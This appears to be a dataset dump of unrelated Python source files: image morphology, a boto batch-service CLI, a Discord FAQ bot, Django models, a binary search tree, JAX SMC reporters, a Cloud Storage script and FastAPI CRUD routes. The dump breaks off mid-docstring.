text stringlengths 38 1.54M |
|---|
import numpy as np
import scipy.misc as misc
import matplotlib.pyplot as plt
# Cross-shaped (4-connected) structuring element used as the default for all
# morphology operations below.
# BUG FIX: the `np.bool` alias was removed in NumPy 1.24; the builtin `bool`
# dtype is the documented replacement.
disc_se = np.array([[False, True, False], [True, True, True], [False, True, False]], dtype=bool)
def dilation(binary_img, structure_element=disc_se):
    """Binary dilation: stamp the structuring element over every set pixel.

    Returns a new array (same shape/dtype as the input) with 255 wherever the
    element, centered on a foreground pixel, covers a cell.
    """
    out = np.zeros_like(binary_img)
    off_y = structure_element.shape[0] // 2
    off_x = structure_element.shape[1] // 2
    # Precompute the set cells of the element once, instead of re-scanning it
    # for every foreground pixel.
    se_cells = [(sy, sx)
                for sy in range(structure_element.shape[0])
                for sx in range(structure_element.shape[1])
                if structure_element[sy, sx]]
    for y in range(binary_img.shape[0]):
        for x in range(binary_img.shape[1]):
            if not binary_img[y, x]:
                continue
            for sy, sx in se_cells:
                safe_set(out, y + sy - off_y, x + sx - off_x, 255)
    return out
def erosion(binary_img, structure_element=disc_se):
    """Binary erosion: keep a pixel only when the element fits entirely on foreground."""
    out = np.zeros_like(binary_img)
    off_y, off_x = structure_element.shape[0] // 2, structure_element.shape[1] // 2
    height, width = binary_img.shape[0], binary_img.shape[1]
    for y in range(height):
        for x in range(width):
            if not binary_img[y, x]:
                continue
            if erosion_check(binary_img, y, x, structure_element, off_y, off_x):
                out[y, x] = 255
    return out
def opening(binary_img, structure_element=disc_se):
    """Morphological opening: erosion then dilation (removes small specks)."""
    eroded = erosion(binary_img, structure_element)
    return dilation(eroded, structure_element)
def closing(binary_img, structure_element=disc_se):
    """Morphological closing: dilation then erosion (fills small holes)."""
    dilated = dilation(binary_img, structure_element)
    return erosion(dilated, structure_element)
def hit_and_miss_transform(binary_img, j, k):
    """Hit-and-miss: pixels where element j fits the foreground AND element k
    fits the background (the complement)."""
    return intersection(erosion(binary_img, j), erosion(complement(binary_img), k))
def complement(binary_img):
    """Return the pixelwise complement (255 - value) as a uint8 image.

    Vectorized replacement for the original per-pixel double loop; output is
    identical for 0/255 binary uint8 images.
    """
    # Widen before subtracting so values > 255 (if any) wrap the same way the
    # original element-wise assignment into a uint8 array did.
    return (255 - binary_img.astype(np.int64)).astype(np.uint8)
def intersection(img1, img2):
    """Pixelwise AND of two binary images: 255 where both are nonzero, else 0.

    Vectorized replacement for the original per-pixel loop; returns uint8 like
    the original `np.zeros_like(img1, np.uint8)` accumulator.
    """
    both = np.logical_and(img1, img2)
    return both.astype(np.uint8) * 255
def erosion_check(binary_img, y, x, structure_element, cent_y, cent_x):
    """Return True when every set cell of the element lands on a set pixel
    (out-of-bounds cells read as 0 via safe_get and therefore fail)."""
    rows = structure_element.shape[0]
    cols = structure_element.shape[1]
    return all(
        safe_get(binary_img, y + sy - cent_y, x + sx - cent_x)
        for sy in range(rows)
        for sx in range(cols)
        if structure_element[sy, sx]
    )
def safe_set(img, y, x, val):
    """Assign img[y, x] = val, silently ignoring out-of-bounds coordinates."""
    in_rows = 0 <= y < img.shape[0]
    in_cols = 0 <= x < img.shape[1]
    if in_rows and in_cols:
        img[y, x] = val
def safe_get(img, y, x):
    """Return img[y, x], or 0 when the coordinates fall outside the image."""
    if not (0 <= y < img.shape[0]) or not (0 <= x < img.shape[1]):
        return 0
    return img[y, x]
def threshold(image, t=128):
    """Binarize: 255 where image >= t, else 0 (same shape/dtype as input).

    Vectorized replacement for the original per-pixel double loop.
    """
    thresholded_img = np.zeros_like(image)
    thresholded_img[image >= t] = 255
    return thresholded_img
if __name__ == '__main__':
    # NOTE(review): scipy.misc.imread/imsave were removed in SciPy 1.2 --
    # migrate to imageio.imread / imageio.imwrite when updating dependencies.
    lena = misc.imread('lena.bmp')
    thresholded_lena = threshold(lena)
    dilated_lena = dilation(thresholded_lena)
    misc.imsave('dilated.png', dilated_lena)
    erosed_lena = erosion(thresholded_lena)
    misc.imsave('erosed.png', erosed_lena)
    opened_lena = opening(thresholded_lena)
    misc.imsave('opened.png', opened_lena)
    closed_lena = closing(thresholded_lena)
    misc.imsave('closed.png', closed_lena)
    # BUG FIX: np.bool was removed in NumPy 1.24; the builtin bool dtype is
    # the equivalent replacement.
    j = np.array([[False, False, False], [True, True, False], [False, True, False]], dtype=bool)
    k = np.array([[False, True, True], [False, False, True], [False, False, False]], dtype=bool)
    ham_lena = hit_and_miss_transform(thresholded_lena, j, k)
    misc.imsave('hit_and_miss.png', ham_lena)
|
#!/usr/bin/env python
# Copyright (c) 2006-2008 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from optparse import OptionParser
from boto.services.servicedef import ServiceDef
from boto.services.submit import Submitter
from boto.services.result import ResultProcessor
import boto
import sys, os
from boto.compat import StringIO
class BS(object):
    """Command-line front end for a boto-based batch service.

    Parses options, loads a ServiceDef config file and dispatches to the
    ``do_<command>`` method named by the second positional argument.
    """
    Usage = "usage: %prog [options] config_file command"
    # Supported sub-commands and the help text shown by --help-commands.
    Commands = {'reset' : 'Clear input queue and output bucket',
                'submit' : 'Submit local files to the service',
                'start' : 'Start the service',
                'status' : 'Report on the status of the service buckets and queues',
                'retrieve' : 'Retrieve output generated by a batch',
                'batches' : 'List all batches stored in current output_domain'}

    def __init__(self):
        """Build the option parser; the actual work happens in main()."""
        self.service_name = None
        self.parser = OptionParser(usage=self.Usage)
        self.parser.add_option("--help-commands", action="store_true", dest="help_commands",
                               help="provides help on the available commands")
        self.parser.add_option("-a", "--access-key", action="store", type="string",
                               help="your AWS Access Key")
        self.parser.add_option("-s", "--secret-key", action="store", type="string",
                               help="your AWS Secret Access Key")
        self.parser.add_option("-p", "--path", action="store", type="string", dest="path",
                               help="the path to local directory for submit and retrieve")
        self.parser.add_option("-k", "--keypair", action="store", type="string", dest="keypair",
                               help="the SSH keypair used with launched instance(s)")
        self.parser.add_option("-l", "--leave", action="store_true", dest="leave",
                               help="leave the files (don't retrieve) files during retrieve command")
        self.parser.set_defaults(leave=False)
        self.parser.add_option("-n", "--num-instances", action="store", type="string", dest="num_instances",
                               help="the number of launched instance(s)")
        self.parser.set_defaults(num_instances=1)
        self.parser.add_option("-i", "--ignore-dirs", action="append", type="string", dest="ignore",
                               help="directories that should be ignored by submit command")
        self.parser.add_option("-b", "--batch-id", action="store", type="string", dest="batch",
                               help="batch identifier required by the retrieve command")

    def print_command_help(self):
        """Print the name and description of each supported command."""
        print('\nCommands:')
        for key in self.Commands.keys():
            print(' %s\t\t%s' % (key, self.Commands[key]))

    def do_reset(self):
        """Drain the input queue and delete generated keys from the output bucket."""
        iq = self.sd.get_obj('input_queue')
        if iq:
            print('clearing out input queue')
            i = 0
            m = iq.read()
            while m:
                i += 1
                iq.delete_message(m)
                m = iq.read()
            print('deleted %d messages' % i)
        ob = self.sd.get_obj('output_bucket')
        ib = self.sd.get_obj('input_bucket')
        if ob:
            # When input and output share a bucket, leave its contents alone.
            if ib and ob.name == ib.name:
                return
            print('delete generated files in output bucket')
            i = 0
            for k in ob:
                i += 1
                k.delete()
            print('deleted %d keys' % i)

    def do_submit(self):
        """Submit all files under --path to the service's input side."""
        if not self.options.path:
            self.parser.error('No path provided')
        if not os.path.exists(self.options.path):
            self.parser.error('Invalid path (%s)' % self.options.path)
        s = Submitter(self.sd)
        # submit_path returns a tuple; index 0 is the batch id, index 1 the file count.
        t = s.submit_path(self.options.path, None, self.options.ignore, None,
                          None, True, self.options.path)
        print('A total of %d files were submitted' % t[1])
        print('Batch Identifier: %s' % t[0])

    def do_start(self):
        """Launch EC2 instance(s) of the service AMI, passing the config as user-data."""
        ami_id = self.sd.get('ami_id')
        instance_type = self.sd.get('instance_type', 'm1.small')
        security_group = self.sd.get('security_group', 'default')
        if not ami_id:
            self.parser.error('ami_id option is required when starting the service')
        ec2 = boto.connect_ec2()
        # Embed the current credentials in the config handed to the instance.
        if not self.sd.has_section('Credentials'):
            self.sd.add_section('Credentials')
        self.sd.set('Credentials', 'aws_access_key_id', ec2.aws_access_key_id)
        self.sd.set('Credentials', 'aws_secret_access_key', ec2.aws_secret_access_key)
        s = StringIO()
        self.sd.write(s)
        rs = ec2.get_all_images([ami_id])
        img = rs[0]
        r = img.run(user_data=s.getvalue(), key_name=self.options.keypair,
                    max_count=self.options.num_instances,
                    instance_type=instance_type,
                    security_groups=[security_group])
        print('Starting AMI: %s' % ami_id)
        print('Reservation %s contains the following instances:' % r.id)
        for i in r.instances:
            print('\t%s' % i.id)

    def do_status(self):
        """Print the approximate queue depth and the output bucket key count."""
        iq = self.sd.get_obj('input_queue')
        if iq:
            print('The input_queue (%s) contains approximately %s messages' % (iq.id, iq.count()))
        ob = self.sd.get_obj('output_bucket')
        ib = self.sd.get_obj('input_bucket')
        if ob:
            # Shared input/output bucket: a key count would be misleading.
            if ib and ob.name == ib.name:
                return
            total = 0
            for k in ob:
                total += 1
            print('The output_bucket (%s) contains %d keys' % (ob.name, total))

    def do_retrieve(self):
        """Download the results of a batch (--batch-id) into --path."""
        if not self.options.path:
            self.parser.error('No path provided')
        if not os.path.exists(self.options.path):
            self.parser.error('Invalid path (%s)' % self.options.path)
        if not self.options.batch:
            self.parser.error('batch identifier is required for retrieve command')
        s = ResultProcessor(self.options.batch, self.sd)
        s.get_results(self.options.path, get_file=(not self.options.leave))

    def do_batches(self):
        """List the batches recorded in the service's output domain."""
        d = self.sd.get_obj('output_domain')
        if d:
            print('Available Batches:')
            rs = d.query("['type'='Batch']")
            for item in rs:
                print(' %s' % item.name)
        else:
            self.parser.error('No output_domain specified for service')

    def main(self):
        """Parse arguments, load the service definition, dispatch the command."""
        self.options, self.args = self.parser.parse_args()
        if self.options.help_commands:
            self.print_command_help()
            sys.exit(0)
        if len(self.args) != 2:
            self.parser.error("config_file and command are required")
        self.config_file = self.args[0]
        self.sd = ServiceDef(self.config_file)
        self.command = self.args[1]
        # Dispatch by naming convention: command 'foo' calls self.do_foo().
        if hasattr(self, 'do_%s' % self.command):
            method = getattr(self, 'do_%s' % self.command)
            method()
        else:
            self.parser.error('command (%s) not recognized' % self.command)
if __name__ == "__main__":
    # Script entry point: build the driver and dispatch the requested command.
    bs = BS()
    bs.main()
|
from enum import Enum
class OdinEnum(Enum):
    """Enumeration Class for OdinEnum

    This enumeration class instructs all enumeration objects inheriting from it
    to show their value when they are requested to be printed to the standard
    output.
    """
    def __str__(self):
        # BUG FIX: __str__ must return a str; coerce so enums whose values are
        # not strings (e.g. ints) do not raise TypeError when printed.
        # Backward-compatible: identical output for string-valued members.
        return str(self.value)
|
import discord
from discord.ext import commands
class Node:
    """A node in the FAQ tree: a question, the emoji that selects it, children."""

    def __init__(self, question, emoji):
        self.question = question
        self.emoji = emoji
        self.children = []

    def add_children(self, *children):
        """Append any number of child nodes."""
        for child in children:
            self.children.append(child)

    def get_node(self, question):
        """Return the node in this subtree whose question matches, or raise."""
        for node in self.create_list():
            if node.question == question:
                return node
        raise Exception("There is no node with this question in this tree!")

    def create_list(self, list=None):
        """Return a pre-order list of this node and all of its descendants.

        BUG FIX: the accumulator defaulted to a mutable ``[]``, which Python
        shares across calls -- every call kept appending to the same list, so
        repeated calls (and get_node) saw stale, ever-growing results.
        """
        if list is None:
            list = []
        list.append(self)
        for child in self.children:
            child.create_list(list)
        return list

    def print_tree(self):
        """Print each question in pre-order, one per line."""
        print(self.question)
        for child in self.children:
            child.print_tree()
# FAQ tree wiring: the root lists the two questions; each child carries the
# answer text and the keycap emoji (1/2) that selects it via reactions.
root = Node(':one: Comment rejoindre le serveur MC?\n:two: Comment devenir builder officiel?', None)
second = Node('Il faut déjà être builder officiel!', '1\N{VARIATION SELECTOR-16}\N{COMBINING ENCLOSING KEYCAP}')
third = Node("Il faut constuire 2 bâtiments en solo.", '2\N{VARIATION SELECTOR-16}\N{COMBINING ENCLOSING KEYCAP}')
root.add_children(second, third)
class HelpBuilding(commands.Cog):
    """Discord cog implementing a reaction-driven FAQ about building."""

    def __init__(self, client):
        self.client = client

    async def add_emojis(self, message, node):
        """React to ``message`` with the emoji of each child of ``node``."""
        for child in node.children:
            try:
                await message.add_reaction(child.emoji)
            except discord.errors.HTTPException:
                print(f"Emoji {child.emoji} not found!")

    @commands.command(brief='[WIP] Aide type FAQ en cours de création')
    async def build(self, ctx):
        """Start the FAQ in the author's DMs; point there from public channels."""
        if ctx.channel.type != discord.ChannelType.private:
            await ctx.send(f"{ctx.author.mention}, regarde tes MPs! :mailbox:")
        message = await ctx.author.send(embed=discord.Embed(description=root.question))
        await self.add_emojis(message, root)

    @commands.command(brief='Trouve le nom d\'une emoji')
    @commands.check_any(commands.is_owner())
    async def emojiname(self, ctx, emoji):
        """DM the named (escaped) representation of an emoji (owner only)."""
        await ctx.author.send(emoji.encode('ascii', 'namereplace'))

    @commands.Cog.listener()
    async def on_reaction_add(self, reaction, user):
        """Advance the FAQ tree when a user reacts to one of the bot's DMs."""
        if reaction.message.channel.type == discord.ChannelType.private and not user.bot:
            try:
                # The embed description identifies which tree node the message shows.
                node = root.get_node(reaction.message.embeds[0].description)
            except Exception:
                return
            for child in node.children:
                if child.emoji == reaction.emoji:
                    message = await reaction.message.channel.send(embed=discord.Embed(type='rich', description=child.question))
                    await self.add_emojis(message, child)
                    break
def setup(client):
    # discord.py extension entry point: register the cog when the bot loads it.
    client.add_cog(HelpBuilding(client))
|
# Comprehension warm-up exercises.
list1 = ['apple', 'orange', 'pear']
# First letter of each word, uppercased.
print([i[0].upper() for i in list1])
list2 = ['apple', 'orange', 'pear']
# Words containing at least one 'p'.
print([i for i in list2 if i.count('p') > 0])
list3 = ["TA_parth", "student_poohbear",
"TA_michael", "TA_guido", "student_htiek"]
# Strip the 'TA_' prefix from the TA entries.
print([i[3:] for i in list3 if i.startswith('TA_')])
list4 = ['apple', 'orange', 'pear']
# NOTE(review): {i, len(i)} builds a *set* per word, not a dict -- if a
# word->length mapping was intended here, it should be {i: len(i)} as below.
print([{i, len(i)} for i in list4])
list5 = ['apple', 'orange', 'pear']
# Dict comprehension: word -> its length.
print({i: len(i) for i in list5})
|
from django.db import models
from django.contrib.auth.models import User
from saekki_pro import settings
from django.contrib.postgres.fields import ArrayField
# Promise (appointment) post.
class Promise(models.Model):
    """A scheduled meet-up post with optional penalty ('betting') settings."""
    user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
    title = models.CharField(max_length=200)
    created_at = models.DateTimeField(auto_now_add=True)
    content = models.TextField()
    setting_date_time = models.CharField(max_length=200)
    # Invited / accepted participant lists (user identifiers as strings).
    pre_party = ArrayField(models.CharField(max_length=15), default=list, null=True, blank=True)
    acpt_party = ArrayField(models.CharField(max_length=15), default=list, null=True, blank=True)
    # Penalty settings
    # Penalty kind ('0': no penalty, '벌금': money fine, '엽사': funny photo)
    what_betting = models.CharField(max_length=30, default='0', null=True, blank=True)
    # Fine basis ('0': default, '시간': per unit of time, '한번': one-time)
    per_or_one = models.CharField(max_length=30, default='0', null=True, blank=True)
    per_min_money = models.CharField(max_length=255, default='100', null=True, blank=True)
    setting_min = models.CharField(max_length=50, default='1', null=True, blank=True)
    onetime_panalty = models.CharField(max_length=50, default='0', null=True, blank=True)
    # Longitude
    longitud = models.FloatField(null=True, blank=True, default=None)
    # Latitude
    latitude = models.FloatField(null=True, blank=True, default=None)
    # Whether the promise has ended
    end = models.PositiveSmallIntegerField(default=0)
    # 'Closing soon' flag
    soon = models.CharField(max_length=10, null=True)
    def __str__(self):
        return self.title
# Comment on a promise post.
class Promise_Comment(models.Model):
    """A user comment attached to a Promise."""
    user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
    promise = models.ForeignKey(Promise, on_delete=models.CASCADE, related_name="comments")
    content = models.TextField()
    created_at = models.DateTimeField(auto_now_add=True)
# Friend model.
class Friend(models.Model):
    """Per-user friend list: ``current_user`` owns the set stored in ``users``."""
    users = models.ManyToManyField(settings.AUTH_USER_MODEL)
    current_user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='owner', null=True, on_delete=models.CASCADE)
    @classmethod
    def make_friend(cls, current_user, new_friend):
        # Get-or-create the owner's row, then add the new friend to its set.
        friend, created = cls.objects.get_or_create(
            current_user = current_user
        )
        friend.users.add(new_friend)
    @classmethod
    def lose_friend(cls, current_user, new_friend):
        # Remove the friend from the owner's set (row is created if missing).
        friend, created = cls.objects.get_or_create(
            current_user = current_user
        )
        friend.users.remove(new_friend)
# Tracks each participant's acceptance/arrival state for a promise.
class Party_detail(models.Model):
    promise = models.ForeignKey(Promise, related_name='party_detail', null=True, on_delete=models.CASCADE)
    user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE)
    # Fine amount
    penalty = models.CharField(max_length=200, default='0', null=True, blank=True)
    # Acceptance status: 1 = accepted, 2 = declined
    acpt = models.PositiveSmallIntegerField(default=0) # 1 : accepted , 2 : declined
    # Success status
    success_or_fail = models.PositiveSmallIntegerField(default=0)
    arrived_time = models.DateTimeField(null=True, blank=True, default=None)
# Funny-photo (betting penalty) model.
class Fun_Image(models.Model):
    user = models.ForeignKey(Party_detail, related_name='fun', null=True, on_delete=models.CASCADE)
    # The funny/penalty photo itself.
    fun_image = models.ImageField(blank=True, null=True, upload_to="promise_fun_tmp")
# Friend-request notification model.
class Notification_friend(models.Model):
    send_user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='firend_send_user', null=True, on_delete=models.CASCADE)
    receive_user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='firend_receive_user', null=True, on_delete=models.CASCADE)
# Promise / comment notification model.
class Notification_promise(models.Model):
    send_user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='promise_send_user', null=True, on_delete=models.CASCADE)
    receive_user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='promise_receive_user', null=True, on_delete=models.CASCADE)
    promise = models.ForeignKey(Promise, related_name='promise_noti', null=True, on_delete=models.CASCADE)
    # Single-character discriminator: comment vs. promise notification
    # (exact values not visible here -- confirm against the view code).
    com_or_pro = models.CharField(max_length=1, null=True)
# Penalty notification model.
class Notification_penalty(models.Model):
    user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='penalty_user', null=True, on_delete=models.CASCADE)
    promise = models.ForeignKey(Promise, related_name='penalty_promise', null=True, on_delete=models.CASCADE)
    penalty = models.CharField(max_length=200, default='0')
    final = models.CharField(max_length=5, default='0')
|
class Node:
    """A single binary-tree node: a value plus left/right child links."""

    def __init__(self, value):
        self.value = value
        self.left = None
        self.right = None
class BinarySearchTree:
    """Unbalanced binary search tree with insert, lookup, remove and traversal.

    Duplicate values are placed in the right subtree (matching the original
    ``else`` branch of ``insert``).
    """

    def __init__(self):
        self.root = None

    def insert(self, value):
        """Insert ``value``; duplicates descend to the right."""
        new_node = Node(value)
        if self.root is None:
            self.root = new_node
            return
        current_node = self.root
        while True:
            if value < current_node.value:
                if current_node.left is None:
                    current_node.left = new_node
                    return
                current_node = current_node.left
            else:
                if current_node.right is None:
                    current_node.right = new_node
                    return
                current_node = current_node.right

    def lookup(self, value):
        """Return a human-readable message saying whether ``value`` is present."""
        current_node = self.root
        while current_node is not None:
            if value < current_node.value:
                current_node = current_node.left
            elif value > current_node.value:
                current_node = current_node.right
            else:
                return 'Value: {0} is available.'.format(current_node.value)
        return 'The value: {0} Not found.'.format(value)

    def remove(self, value):
        """Remove ``value`` from the tree.

        Returns True when a node was removed; returns None when the tree is
        empty or the value is absent (preserving the original contract).
        BUG FIX: the original parent re-link used strict </> comparisons, so a
        duplicate value equal to its parent was never actually unlinked; the
        equal case now falls into the right-child branch, where duplicates live.
        """
        if self.root is None:
            return None
        current_node = self.root
        parent_node = None
        while current_node is not None:
            if value < current_node.value:
                parent_node = current_node
                current_node = current_node.left
            elif value > current_node.value:
                parent_node = current_node
                current_node = current_node.right
            else:
                # Found the node to delete.
                if current_node.right is None:
                    # Case 1: no right child -- splice in the left subtree.
                    if parent_node is None:
                        self.root = current_node.left
                    elif current_node.value < parent_node.value:
                        parent_node.left = current_node.left
                    else:
                        parent_node.right = current_node.left
                elif current_node.right.left is None:
                    # Case 2: right child has no left child -- lift the right child.
                    current_node.right.left = current_node.left
                    if parent_node is None:
                        self.root = current_node.right
                    elif current_node.value < parent_node.value:
                        parent_node.left = current_node.right
                    else:
                        parent_node.right = current_node.right
                else:
                    # Case 3: replace with the in-order successor
                    # (leftmost node of the right subtree).
                    leftmost = current_node.right.left
                    leftmost_parent = current_node.right
                    while leftmost.left is not None:
                        leftmost_parent = leftmost
                        leftmost = leftmost.left
                    leftmost_parent.left = leftmost.right
                    leftmost.left = current_node.left
                    leftmost.right = current_node.right
                    if parent_node is None:
                        self.root = leftmost
                    elif current_node.value < parent_node.value:
                        parent_node.left = leftmost
                    else:
                        parent_node.right = leftmost
                return True
        return None

    def tranverse(self, node):
        """Return the subtree rooted at ``node`` as nested dicts.

        BUG FIX: the original bound ``tree = node.value`` (a plain value) and
        then assigned ``tree.left`` on it, and recursed into a nonexistent
        ``self.traverse`` -- it crashed on any call.  This version returns
        ``{'value': v, 'left': ..., 'right': ...}`` with None for absent
        children, matching the apparent intent of serializing the tree.
        """
        if node is None:
            return None
        return {
            'value': node.value,
            'left': self.tranverse(node.left),
            'right': self.tranverse(node.right),
        }
# Manual smoke test: build a small tree, remove a value, then look it up
# (the lookup is expected to report the value as not found after removal).
tree = BinarySearchTree()
tree.insert(9)
tree.insert(4)
tree.insert(6)
tree.insert(20)
tree.insert(170)
tree.insert(15)
tree.insert(1)
t = tree.remove(15)
print(t)
s = tree.lookup(15)
print(s)
|
"""
simple reporter utilities for SMC
"""
import numpy as np
from jax.lax import stop_gradient
import jax
from jax.ops import index, index_add, index_update
from jax import numpy as jnp
from jax.config import config; config.update("jax_enable_x64", True)
class BaseSMCReporter(object):
    """
    generalized reporter object for SMC

    Preallocates (T, N, Dx) particle storage, per-step log-weights and a
    normalized-ESS trace; subclasses override report() to fill them in.
    """
    def __init__(self,
                 T,
                 N,
                 Dx,
                 save_Xs=True):
        # T: number of SMC steps; N: number of particles; Dx: state dimension.
        self.X = jnp.zeros((T,N,Dx))
        self.nESS = jnp.zeros(T)
        self.logW = jnp.zeros((T,N))
        # When False, subclasses skip storing the (potentially large) X arrays.
        self.save_Xs=save_Xs
    def report(self, t, reportables):
        """
        arguments
            reportables : tuple

        Base implementation is a no-op; see vSMCReporter for a concrete one.
        """
        # X, logZ, nESS = reportables
        # self.X[t] = X
        # self.logZ[t] = logZ
        # self.nESS[t] = nESS
        pass
class vSMCReporter(BaseSMCReporter):
    """
    reporter object for vSMC

    Records particles, log-weights and normalized ESS for each SMC step into
    the arrays preallocated by BaseSMCReporter.
    """
    def __init__(self, T, N, Dx, save_Xs=True):
        super().__init__(T, N, Dx, save_Xs)

    def report(self, t, reportables):
        """
        arguments
            t : int time index into the preallocated arrays
            reportables : tuple
                X, logW, nESS for step t

        BUG FIX: ``jax.ops.index_update`` was deprecated in JAX 0.2.22 and
        later removed; the ``Array.at[...].set(...)`` API is the supported
        functional-update equivalent.  stop_gradient keeps the stored
        diagnostics out of the autodiff graph, as before.
        """
        X, logW, nESS = reportables
        if self.save_Xs:
            self.X = self.X.at[t, :].set(stop_gradient(X))
        self.logW = self.logW.at[t].set(stop_gradient(logW))
        self.nESS = self.nESS.at[t].set(stop_gradient(nESS))
|
"""Programatically interact with a Google Cloud Storage bucket."""
from pip._internal import main as pipmain
from os import environ
import os
# Ensure the GCS client library is present, installing it on the fly if needed.
# NOTE(review): installing via pip at import time is fragile; prefer declaring
# google-cloud-storage as a real dependency of the project.
try:
    from google.cloud import storage
except ModuleNotFoundError:
    pipmain(['install', 'google-cloud-storage'])
    from google.cloud import storage
# NOTE(review): these look up env vars literally named 'spotifair', 'Song' and
# 'file' -- presumably they were meant to be variable *names* holding the
# bucket/folder config; verify against the deployment environment.
bucketName = environ.get('spotifair')
bucketFolder = environ.get('Song')
localFolder = environ.get('file')
# Service-account credentials and a module-level client/bucket used by all helpers.
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "Spotifair-df3788c7a929.json"
storage_client = storage.Client()
bucket = storage_client.get_bucket('spotifair')
def upload_files(bucketName, bucketFolder, localFolder, name):
    """Upload files to GCP bucket.

    Uses the module-level ``bucket`` client; the ``bucketName`` parameter is
    only interpolated into the returned message.
    """
    blob = bucket.blob(bucketFolder +'/' + name)
    blob.upload_from_filename(localFolder + name)
    return f'Uploaded {name} to "{bucketName}" bucket.'
def list_files(bucketName):
    """List all files in GCP bucket.

    NOTE(review): the ``bucketName`` parameter is unused -- the module-level
    ``bucket`` and ``bucketFolder`` globals are what is actually queried.
    Entries without a '.' (i.e. folder placeholders) are filtered out.
    """
    files = bucket.list_blobs(prefix=bucketFolder)
    fileList = [file.name for file in files if '.' in file.name]
    return fileList
def download_random_file(bucketName, bucketFolder, localFolder, name):
    """Download the bucket file matching ``name`` into ``localFolder``.

    (Despite the historical name, this fetches a *specific* file, not a
    random one.)  Returns a confirmation message on success.
    """
    fileList = list_files(bucketName)
    # BUG FIX: when no entry matched, ``song`` was never bound and the code
    # below raised an opaque NameError; fail with an explicit error instead.
    for i, candidate in enumerate(fileList):
        if candidate == str(name):
            song = i
            break
    else:
        raise FileNotFoundError(f'{name} not found in bucket "{bucketName}".')
    blob = bucket.blob(fileList[song])
    fileName = blob.name.split('/')[-1]
    blob.download_to_filename(localFolder + fileName)
    return f'{fileName} downloaded from bucket.'
|
from typing import List
from fastapi import Depends, FastAPI, HTTPException
from sqlalchemy.orm import Session
from src import models, schemas, crud
from src.database import engine, SessionLocal
# Create all ORM tables on import, then instantiate the FastAPI application.
models.Base.metadata.create_all(bind=engine)
app = FastAPI()
def get_db():
    """Dependency: yield a database session and always close it afterwards."""
    session = SessionLocal()
    try:
        yield session
    finally:
        session.close()
# Product Type
@app.post("/product_type/", response_model=schemas.ProductType)
def create_product_type(product_type: schemas.ProductTypeCreate, db: Session = Depends(get_db)):
    """Create a product type; reject duplicate names with HTTP 400."""
    existing = crud.get_product_type_by_name(db, name=product_type.name)
    if existing:
        raise HTTPException(status_code=400, detail="Name already occupied")
    return crud.create_product_type(db=db, product_type=product_type)
@app.get("/product_types/", response_model=List[schemas.ProductType])
def read_product_types(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):
    """Return a paginated list of product types."""
    return crud.get_product_types(db, skip=skip, limit=limit)
@app.get("/product_type/name/{product_type_name}", response_model=schemas.ProductType)
def read_product_type_by_name(product_type_name: str, db: Session = Depends(get_db)):
    """Fetch a product type by name; 404 when absent."""
    found = crud.get_product_type_by_name(db, name=product_type_name)
    if found is None:
        raise HTTPException(status_code=404, detail="Product type not found")
    return found
@app.get("/product_type/id/{product_type_id}", response_model=schemas.ProductType)
def read_product_type(product_type_id: int, db: Session = Depends(get_db)):
    """Fetch a product type by primary key; 404 when absent."""
    found = crud.get_product_type_by_id(db, product_type_id=product_type_id)
    if found is None:
        raise HTTPException(status_code=404, detail="Product type not found")
    return found
# Product
@app.post("/product/", response_model=schemas.Product)
def create_product(product: schemas.ProductCreate, db: Session = Depends(get_db)):
    """Create a product; reject duplicate names with HTTP 400."""
    existing = crud.get_product_by_name(db, name=product.name)
    if existing:
        raise HTTPException(status_code=400, detail="Name already occupied")
    return crud.create_product(db=db, product=product)
@app.get("/products/", response_model=List[schemas.Product])
def read_products(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):
    """Return a paginated list of products."""
    return crud.get_products(db, skip=skip, limit=limit)
@app.get("/product/name/{product_name}", response_model=schemas.Product)
def read_product_by_name(product_name: str, db: Session = Depends(get_db)):
    """Fetch a product by name; 404 when absent."""
    found = crud.get_product_by_name(db, name=product_name)
    if found is None:
        raise HTTPException(status_code=404, detail="Product not found")
    return found
@app.get("/product/id/{product_id}", response_model=schemas.Product)
def read_product(product_id: int, db: Session = Depends(get_db)):
    """Fetch a product by primary key; 404 when absent."""
    found = crud.get_product(db, product_id=product_id)
    if found is None:
        raise HTTPException(status_code=404, detail="Product not found")
    return found
# Transaction
@app.post("/transaction/", response_model=schemas.Transaction)
def create_transaction(transaction: schemas.TransactionCreate, db: Session = Depends(get_db)):
    """Persist a new transaction (no uniqueness check, unlike product creation)."""
    return crud.create_transaction(db=db, transaction=transaction)
@app.get("/transactions/", response_model=List[schemas.Transaction])
def read_transactions(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):
    """Return a paginated list of transactions."""
    return crud.get_transactions(db, skip=skip, limit=limit)
@app.get("/transactions/recipient/{recipient_code}", response_model=schemas.Transaction)
def read_transactions_by_recipient(recipient_code: str, db: Session = Depends(get_db)):
    """Fetch transactions for a recipient; 404 when none exist.

    BUG FIX: the path template declares ``{recipient_code}`` but the function
